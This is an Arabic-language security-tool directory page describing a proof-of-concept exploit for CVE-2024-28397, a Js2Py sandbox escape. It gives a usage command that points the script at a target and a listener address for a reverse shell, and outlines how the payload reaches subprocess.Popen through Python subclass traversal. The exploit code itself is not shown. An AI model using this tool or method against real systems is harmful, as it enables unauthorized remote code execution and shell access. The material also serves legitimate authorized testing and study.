Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-28397-Js2Py-RCE — يحتوي هذا المستودع على إثبات مفهوم (PoC) للثغرة CVE-2024-28397، وهي ثغرة في مكتبة js2py تسمح بالهروب من بيئة العزل (sandbox) لتحقيق تنفيذ برمجي عن بُعد. | Kitploit
أدوات/GitHubGitHub/d3ltaformation/cve-2024-28397-js2py-rce
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأداة الوصول عن بعدتطوير الحمولات
GitHubd3ltaformation/cve-2024-28397-js2py-rce

CVE-2024-28397-Js2Py-RCE

يحتوي هذا المستودع على إثبات مفهوم (PoC) للثغرة CVE-2024-28397، وهي ثغرة في مكتبة js2py تسمح بالهروب من بيئة العزل (sandbox) لتحقيق تنفيذ برمجي عن بُعد.

عرض المستودع
2منذ 11 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-28397-Js2Py-RCE

الوصف

يحتوي هذا المستودع على إثبات مفهوم (PoC) مبني بلغة Python لثغرة CVE-2024-28397، وهي ثغرة من نوع الهروب من بيئة العزل (Sandbox Escape) في مترجم JavaScript الخاص بـ Js2Py الخاص بـ Python. عندما يقوم التطبيق المستهدف بتقييم كود JS غير موثوق عبر Js2Py، يمكن للمهاجم الخروج من بيئة العزل وتنفيذ كود Python تعسفي. ويمكن استغلال ذلك للحصول على تنفيذ أكواد عن بُعد (RCE) وقشرة عكسية (Reverse Shell) على النظام المستهدف.

استُوحي هذا الاستغلال من مشروع CVE-2024-28397-js2py-Sandbox-Escape الخاص بـ Marven11.


إخلاء المسؤولية

تم توفير هذا السكربت لأغراض تعليمية ولاختبار الاختراق المصرّح به فقط. الاستخدام غير المصرّح به لهذا السكربت ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها يعد غير قانوني وغير أخلاقي. لا يتحمل المؤلف أي مسؤولية عن إساءة الاستخدام أو الأضرار التي يسببها هذا السكربت.


حول الثغرة

  • معرف CVE: CVE-2024-28397
  • المكوّن: الهروب من بيئة عزل Js2Py
  • التأثير: وصول غير مقيد إلى نموذج كائنات Python عبر __class__.__base__.__subclasses__، مما يؤدي إلى تنفيذ كود تعسفي
  • متجه الهجوم: عن بُعد (عبر واجهة HTTP مكشوفة تُقيّم JavaScript يتحكم فيه المستخدم)

الميزات

  • تسليم تلقائي لحمولة القشرة العكسية عبر تنفيذ كود Python عن بُعد (RCE)
  • تنفيذ أوامر الصدفة المشفّرة بـ Base64 بشكل مضمّن
  • مستمع قشرة عكسية مدمج مع تثبيت أساسي لـ PTY
  • تنسيق نظيف للمخرجات
  • خفيف الوزن وبدون تبعيات (باستثناء requests)

المتطلبات

  • Python 3.x
  • وحدة requests ()
pip install requests
  • نظام Linux (للقشرة العكسية عبر /dev/tcp)
  • هدف يشغّل نسخة ضعيفة من Js2Py

  • الاستخدام

    root@kitploit:~
    python3 exploit.py --target http://example.htb --lhost 10.10.14.51 --lport 4444
    
    • --target: عنوان URL الكامل لنقطة نهاية تطبيق الويب الضعيف
    • --lhost: عنوان IP المحلي لديك (يُستخدم للقشرة العكسية)
    • --lport: المنفذ المحلي لديك لاستقبال القشرة

    كيف يعمل

    1. يقوم السكربت بتجهيز قشرة عكسية Bash، وترميزها بـ Base64، وحقنها في حمولة JavaScript.
    2. تتنقّل حمولة JS في شجرة كائنات Python باستخدام __class__.__base__.__subclasses__() للعثور على subprocess.Popen.
    3. يستخدم Popen لفك ترميز القشرة وتنفيذها.
    4. يتلقى جهاز المهاجم القشرة العكسية ويقوم بتثبيتها تلقائيًا.
    تنزيل الأداة